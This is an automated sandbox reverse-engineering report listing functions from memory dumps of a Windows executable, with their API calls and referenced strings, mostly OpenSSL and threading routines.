Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00405FC0, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 131

APIs

strerror.MSVCRT ref: 00406143
strncpy.MSVCRT ref: 0040615B

Strings

unknown, xrefs: 0040610B
, xrefs: 0040614F
err.c, xrefs: 00406047, 00406079, 004060A7, 004060D5, 00406188, 004061E9

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004060F9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54

APIs

strerror.MSVCRT ref: 00406143
strncpy.MSVCRT ref: 0040615B

Strings

unknown, xrefs: 0040610B
, xrefs: 0040614F
err.c, xrefs: 00406188

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E31B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50

APIs

GetCurrentThreadId.KERNEL32 ref: 004E31F6
_ultoa.MSVCRT ref: 004E320F
OutputDebugStringA.KERNEL32 ref: 004E3243
abort.MSVCRT(00000000), ref: 004E324A

Strings

Error cleaning up spin_keys for thread , xrefs: 004E31DB

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004163A0, Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 264

APIs

Part of subcall function 00425FC0: memset.MSVCRT ref: 00426089

strlen.MSVCRT ref: 004164F1
strlen.MSVCRT ref: 0041662C
strlen.MSVCRT ref: 004166B9

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

Strings

P, xrefs: 00416710
.%lu, xrefs: 0041660D

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00407060, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 162

APIs

memcpy.MSVCRT ref: 0040712F

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

memcpy.MSVCRT ref: 004071EB
memcpy.MSVCRT ref: 00407222

Strings

evp_enc.c, xrefs: 004071C0, 0040729F
bl <= (int)sizeof(ctx->buf), xrefs: 004071B0, 0040728F

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00476980, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 160

APIs

memcpy.MSVCRT ref: 00476A0A
memset.MSVCRT ref: 00476A34

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

Part of subcall function 00436470: memcpy.MSVCRT ref: 00436504

Strings

j <= (int)sizeof(ctx->key), xrefs: 00476B90
t, xrefs: 00476B98
hmac.c, xrefs: 00476BA0

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00455A30, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 146

APIs

strlen.MSVCRT ref: 00455A85

Part of subcall function 004558F0: memcmp.MSVCRT ref: 00455940

Strings

U, xrefs: 00455AA0
@UE, xrefs: 00455B88
@UE, xrefs: 00455B11
0, xrefs: 00455BF0

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0049A3B0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 128

APIs

memcpy.MSVCRT ref: 0049A46B

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

memcpy.MSVCRT ref: 0049A51C
memcpy.MSVCRT ref: 0049A542

Strings

ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0049A4D0
encode.c, xrefs: 0049A4E0

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0045D129, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 120

APIs

Part of subcall function 00457B40: strcat.MSVCRT ref: 00457C0A
Part of subcall function 00457B40: strcat.MSVCRT ref: 00457C7A

strlen.MSVCRT ref: 0045D1F1

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

Strings

P, xrefs: 0045D19D
A, xrefs: 0045D2C0
v3_info.c, xrefs: 0045D202, 0045D2B8
- , xrefs: 0045D23F

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00457090, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 106

APIs

strchr.MSVCRT ref: 004570A5
memcpy.MSVCRT ref: 00457143
memset.MSVCRT ref: 00457164
memcpy.MSVCRT ref: 00457185

Part of subcall function 00455C90: sscanf.MSVCRT ref: 00455CC3

Part of subcall function 004660F0: strchr.MSVCRT ref: 0046611B
Part of subcall function 004660F0: isspace.MSVCRT ref: 00466183
Part of subcall function 004660F0: strchr.MSVCRT ref: 0046619E
Part of subcall function 004660F0: isspace.MSVCRT ref: 004661DA
Part of subcall function 004660F0: strlen.MSVCRT ref: 004661F3

Strings

:, xrefs: 004570C6

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00414A67, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 104

APIs

memcpy.MSVCRT ref: 00414A7D

Part of subcall function 00413470: memcmp.MSVCRT ref: 0041348A

memset.MSVCRT ref: 00414AE9
strlen.MSVCRT ref: 00414B6C

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

Strings

thread=%lu, file=%s, line=%d, info=", xrefs: 00414B13
>, xrefs: 00414ADA

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E1270, Relevance: 7.6, APIs: 5, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E1F9A), ref: 004E1287
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004E1F9A), ref: 004E12A7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E1F9A), ref: 004E12D5
ReleaseSemaphore.KERNEL32 ref: 004E130A
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E1F9A), ref: 004E1323

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004303A0, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 56

APIs

memcpy.MSVCRT ref: 00430406

Strings

h, xrefs: 0043043A
^, xrefs: 00430422
buf_str.c, xrefs: 004303E5, 0043042A
A, xrefs: 00430432

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00430480, Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 41

APIs

memcpy.MSVCRT ref: 004304C3

Strings

A, xrefs: 004304F0
buf_str.c, xrefs: 004304A2, 004304E8
q, xrefs: 004304E0
g, xrefs: 004304F8

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004053C0, Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 35

APIs

strlen.MSVCRT ref: 00405407

Strings

f, xrefs: 00405410
s, xrefs: 00405420
~, xrefs: 00405428
bss_mem.c, xrefs: 00405418

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E17B0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191

APIs

WaitForMultipleObjects.KERNEL32 ref: 004E17FA
WaitForSingleObject.KERNEL32 ref: 004E183D

Part of subcall function 004E42D0: ResetEvent.KERNEL32 ref: 004E433E
Part of subcall function 004E42D0: WaitForSingleObject.KERNEL32 ref: 004E4399
Part of subcall function 004E42D0: Sleep.KERNEL32 ref: 004E43CE
Part of subcall function 004E42D0: Sleep.KERNEL32 ref: 004E43F3

ResetEvent.KERNEL32 ref: 004E1A02

Strings

(, xrefs: 004E1969

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E2E30, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101

APIs

malloc.MSVCRT ref: 004E2E65
memmove.MSVCRT ref: 004E2F09
realloc.MSVCRT ref: 004E2F46

Strings

x#9, xrefs: 004E2E4C, 004E2E7E, 004E2F3E, 004E2F57

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004D1AF0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92

Strings

Address %p has no image-section, xrefs: 004D1C1E
@, xrefs: 004D1BAB

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0046232C, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60

APIs

Part of subcall function 00456CB0: strlen.MSVCRT ref: 00456CC1
Part of subcall function 00456CB0: strncmp.MSVCRT ref: 00456CD3

strspn.MSVCRT ref: 0046219F
strspn.MSVCRT ref: 004621C3
strspn.MSVCRT ref: 004621DD

Part of subcall function 00430450: strlen.MSVCRT ref: 0043045F

strspn.MSVCRT ref: 004622F9

Strings

0123456789, xrefs: 004622EE
inherit, xrefs: 004622DE
RDI, xrefs: 00462330

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004015D7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36

APIs

GetModuleHandleA.KERNEL32 ref: 00401592
GetProcAddress.KERNEL32 ref: 004015AB

Strings

libgcj-16.dll, xrefs: 0040158B
_Jv_RegisterClasses, xrefs: 004015A0

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00463CE0, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

Part of subcall function 004628A0: memcmp.MSVCRT ref: 004628D3

memcmp.MSVCRT ref: 00463E83
memcmp.MSVCRT ref: 00463EA3
memcmp.MSVCRT ref: 00463EBF
memcmp.MSVCRT ref: 00463F13
memcmp.MSVCRT ref: 00463F95

Part of subcall function 00462760: memcmp.MSVCRT ref: 00462777

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E2F90, Relevance: 6.3, APIs: 5, Instructions: 95

APIs

Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E2560
Part of subcall function 004E2510: WaitForSingleObject.KERNEL32 ref: 004E25A2
Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,004E7324,?,?,?,005704F9,?,?,?,?,00000001), ref: 004E25C5
Part of subcall function 004E2510: CreateEventA.KERNEL32 ref: 004E260F
Part of subcall function 004E2510: CloseHandle.KERNEL32 ref: 004E262E
Part of subcall function 004E2510: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E263C

free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E2FBD
free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E2FCC
free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E2FDB

Part of subcall function 004E2810: GetCurrentThreadId.KERNEL32 ref: 004E2867
Part of subcall function 004E2810: SetEvent.KERNEL32 ref: 004E2896

free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E30AB
memmove.MSVCRT ref: 004E30EB

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D1460, Relevance: 6.3, APIs: 5, Instructions: 91

APIs

Part of subcall function 004D0F00: strlen.MSVCRT ref: 004D0F66
Part of subcall function 004D0F00: strlen.MSVCRT ref: 004D106B
Part of subcall function 004D0F00: strlen.MSVCRT ref: 004D10C2

strlen.MSVCRT ref: 004D14F5
memcpy.MSVCRT ref: 004D1510
free.MSVCRT(?,?,?,?,?,?,?,?,?,004E8A4B), ref: 004D151A
free.MSVCRT(?,?,?,?,?,?,?,?,?,004E8A4B), ref: 004D1543
free.MSVCRT(?,?,?,?,?,?,?,?,?,004E8A4B), ref: 004D1587

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D0F00, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 328

APIs

strlen.MSVCRT ref: 004D0F66
strlen.MSVCRT ref: 004D106B
strlen.MSVCRT ref: 004D10C2

Strings

_GLOBAL_, xrefs: 004D0F32

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00412499, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 216

APIs

Part of subcall function 00436470: memcpy.MSVCRT ref: 00436504

memcmp.MSVCRT ref: 00412720

Strings

pk7_doit.c, xrefs: 00412598, 004125C8, 00412698, 00412731, 004127F4, 0041282A
i, xrefs: 00412801
q, xrefs: 0041283D

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0047D2D0, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 190

APIs

memcpy.MSVCRT ref: 0047D45D

Strings

ec_lib.c, xrefs: 0047D2F9, 0047D42E, 0047D4A8
B, xrefs: 0047D4B0
j, xrefs: 0047D4B8

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00447DB0, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 183

APIs

memcpy.MSVCRT ref: 00447E4F

Part of subcall function 00407A50: memcpy.MSVCRT ref: 00407CBE
Part of subcall function 00407A50: memcpy.MSVCRT ref: 00407CD9
Part of subcall function 00407A50: memcpy.MSVCRT ref: 00407DED

Part of subcall function 00447BA0: memcpy.MSVCRT ref: 00447C31

Strings

p5_pbev2.c, xrefs: 00447FFA, 00448028, 004480B8
r, xrefs: 004480C0
g, xrefs: 00448020

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00441F50, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 176

Strings

:, xrefs: 00442180
j, xrefs: 004421F7
tasn_dec.c, xrefs: 004420D7, 0044210A, 00442178, 004421B4, 004421E7

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0040CB5C, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 129

APIs

memcpy.MSVCRT ref: 0040CC97

Strings

m, xrefs: 0040CD45
evp_asn1.c, xrefs: 0040CCCA, 0040CD38
m, xrefs: 0040CB96

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0049B6B0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 125

APIs

strlen.MSVCRT ref: 0049B7B9

Part of subcall function 004B0AC0: gmtime.MSVCRT ref: 004B0ACF

Strings

a_utctm.c, xrefs: 0049B72A, 0049B7D9
A, xrefs: 0049B7E1
%02d%02d%02d%02d%02d%02dZ, xrefs: 0049B783

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00407400, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 123

APIs

Part of subcall function 00407060: memcpy.MSVCRT ref: 0040712F
Part of subcall function 00407060: memcpy.MSVCRT ref: 004071EB
Part of subcall function 00407060: memcpy.MSVCRT ref: 00407222

memcpy.MSVCRT ref: 00407509

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

memcpy.MSVCRT ref: 00407581

Strings

evp_enc.c, xrefs: 00407540
b <= sizeof ctx->final, xrefs: 00407530

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00416B60, Relevance: 6.1, APIs: 4, Instructions: 114

APIs

isalnum.MSVCRT ref: 00416BBA
isspace.MSVCRT ref: 00416C0F
isspace.MSVCRT ref: 00416C64
isspace.MSVCRT ref: 00416C7F

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004477E0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 109

APIs

Part of subcall function 0040C4B0: memcpy.MSVCRT ref: 0040C519
Part of subcall function 0040C4B0: strlen.MSVCRT ref: 0040C567

memcpy.MSVCRT ref: 004478D5

Strings

l, xrefs: 004479B0
A, xrefs: 00447970
p5_pbe.c, xrefs: 00447859, 00447968

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

